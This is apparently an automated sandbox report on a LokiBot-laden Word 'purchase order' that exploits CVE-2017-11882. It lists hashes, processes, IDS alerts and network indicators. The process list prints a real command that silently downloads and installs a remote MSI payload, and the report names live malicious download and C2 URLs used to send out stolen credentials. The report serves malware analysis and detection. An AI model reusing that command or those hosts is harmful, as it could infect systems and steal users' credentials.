analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

New Order - PO-LBJPS19-01811.docx

Full analysis: https://app.any.run/tasks/7c56a3df-2859-4af6-89ba-667c31e29677
Verdict: Malicious activity
Threats:

LokiBot was developed in 2015 to steal information from a variety of applications. Despite the age, this malware is still rather popular among cybercriminals.

Analysis date: December 14, 2018, 06:04:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
exploit
CVE-2017-11882
exe-to-msi
trojan
lokibot
opendir
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

B37879A5ECD333C16F7A192F86855115

SHA1:

5A658A85E90434FB3750D6F210D4B6A695FF2B33

SHA256:

D1B1321BEA0B253F8527AF8AE0F32103470F6167CAE585D228840EBBDB515DCF

SSDEEP:

3072:e7lL2mrdFADYhDFc8rpKSvNYbWRDzUyRBelYc3nTMSFm9d+tlKSIKg:e7lCAdFkYhDFBxvqyRmTMSFmfSe

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 2160)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3564)
    • LOKIBOT was detected

      • MSIA2C1.tmp (PID: 1328)
    • Detected artifacts of LokiBot

      • MSIA2C1.tmp (PID: 1328)
    • Connects to CnC server

      • MSIA2C1.tmp (PID: 1328)
    • Actions looks like stealing of personal data

      • MSIA2C1.tmp (PID: 1328)
  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 3196)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 3196)
      • MSIA2C1.tmp (PID: 1328)
    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3564)
    • Reads Internet Cache Settings

      • MSIA2C1.tmp (PID: 1328)
    • Creates files in the user directory

      • MSIA2C1.tmp (PID: 1328)
    • Loads DLL from Mozilla Firefox

      • MSIA2C1.tmp (PID: 1328)
  • INFO

    • Application was crashed

      • EQNEDT32.EXE (PID: 3564)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 3196)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 3196)
      • MSIA2C1.tmp (PID: 2980)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3320)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3320)
    • Application was dropped or rewritten from another process

      • MSIA2C1.tmp (PID: 1328)
      • MSIA2C1.tmp (PID: 2980)
    • Application launched itself

      • MSIA2C1.tmp (PID: 2980)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x2ea8411c
ZipCompressedSize: 351
ZipUncompressedSize: 1364
ZipFileName: [Content_Types].xml

XML

Template: template.dotx
TotalEditTime: -
Pages: 1
Words: -
Characters: 1
Application: Microsoft Office Word
DocSecurity: None
Lines: 1
Paragraphs: 1
ScaleCrop: No
HeadingPairs:
  • Title
  • 1
TitlesOfParts: -
Company: -
LinksUpToDate: No
CharactersWithSpaces: 1
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15
Keywords: -
LastModifiedBy: Richard
RevisionNumber: 2
CreateDate: 2018:12:11 23:39:00Z
ModifyDate: 2018:12:11 23:39:00Z

XMP

Title: -
Subject: -
Creator: Windows User
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msia2c1.tmp no specs #LOKIBOT msia2c1.tmp

Process information

PID
CMD
Path
Indicators
Parent process
3320"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\New Order - PO-LBJPS19-01811.docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3564"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2160cmd.exe & /C CD C: & msiexec.exe /i https://vkingsolutions.com/css/secured/baz.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2904msiexec.exe /i https://vkingsolutions.com/css/secured/baz.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3196C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2336"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2980"C:\Windows\Installer\MSIA2C1.tmp"C:\Windows\Installer\MSIA2C1.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1328"C:\Windows\Installer\MSIA2C1.tmp"C:\Windows\Installer\MSIA2C1.tmp
MSIA2C1.tmp
User:
admin
Integrity Level:
MEDIUM
Total events
1 791
Read events
1 221
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
37
Text files
15
Unknown types
7

Dropped files

PID
Process
Filename
Type
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8505.tmp.cvr
MD5:
SHA256:
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{6B26F23A-3250-4FF7-8DA3-331B4F5EB084}
MD5:
SHA256:
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{6BB91254-169B-4812-875B-4F285D828E1A}
MD5:
SHA256:
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{6A17FB15-5F20-4CB2-B2A2-4FAD02D4CB4D}
MD5:
SHA256:
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{2A01C260-6B0A-4A81-B6EF-9A5EB442D5E3}.FSDbinary
MD5:BED4679A049BDF2DE31D6CCC8842C4E0
SHA256:F67F13DE367EF2360F542F08C4F48E57980E3B1C7500023EAEAD52070922BDC1
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:27691E6A32A9EF1B3F5BF840A060B3E1
SHA256:BDD5F0F8B8D303AB8ABE8C02EAF2523CEC9C077D50425D1DEA5E5163CB744D05
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSDbinary
MD5:35290DB82F7B2F8111044FE46F41417A
SHA256:E7B1CCFDD45A164133C74E249F6DE076400B99B708EFC1D68069473154D88FB3
3320WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSFbinary
MD5:33B7505E5CA00C0CA710521D0CFEB5BA
SHA256:1B4284FFBA8839672E90583A9D39953AE1DAC4C4BA1E75BCB0B9D0D342DD2509
3320WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:0FEE22FA40EAB618E269AF59EF990721
SHA256:DB543AC7F35DE26670D8A65A74DD48BCF6E5E70FF2A75D8A42E2FD500F8A170D
3320WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$w Order - PO-LBJPS19-01811.docxpgc
MD5:2A466149C7115F4A1C3EED12F515FD71
SHA256:C55F00C42A133552917765412354813B6655EB0611101809CF55904B3718A42E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
7
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1328
MSIA2C1.tmp
POST
104.24.119.38:80
http://e-vam.ir/wp-includes/themes/fre.php
US
malicious
1328
MSIA2C1.tmp
POST
104.24.119.38:80
http://e-vam.ir/wp-includes/themes/fre.php
US
malicious
1328
MSIA2C1.tmp
POST
104.24.119.38:80
http://e-vam.ir/wp-includes/themes/fre.php
US
malicious
1328
MSIA2C1.tmp
POST
104.24.119.38:80
http://e-vam.ir/wp-includes/themes/fre.php
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3196
msiexec.exe
195.201.197.24:443
vkingsolutions.com
Awanti Ltd.
RU
unknown
1328
MSIA2C1.tmp
104.24.119.38:80
e-vam.ir
Cloudflare Inc
US
shared
3320
WINWORD.EXE
195.201.197.24:443
vkingsolutions.com
Awanti Ltd.
RU
unknown

DNS requests

Domain
IP
Reputation
vkingsolutions.com
  • 195.201.197.24
unknown
e-vam.ir
  • 104.24.119.38
  • 104.24.118.38
malicious

Threats

PID
Process
Class
Message
1328
MSIA2C1.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
1328
MSIA2C1.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
1328
MSIA2C1.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
1328
MSIA2C1.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
1328
MSIA2C1.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
1328
MSIA2C1.tmp
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
1328
MSIA2C1.tmp
A Network Trojan was detected
ET TROJAN LokiBot Checkin
1328
MSIA2C1.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
1328
MSIA2C1.tmp
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
1328
MSIA2C1.tmp
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
4 ETPRO signatures available at the full report
No debug info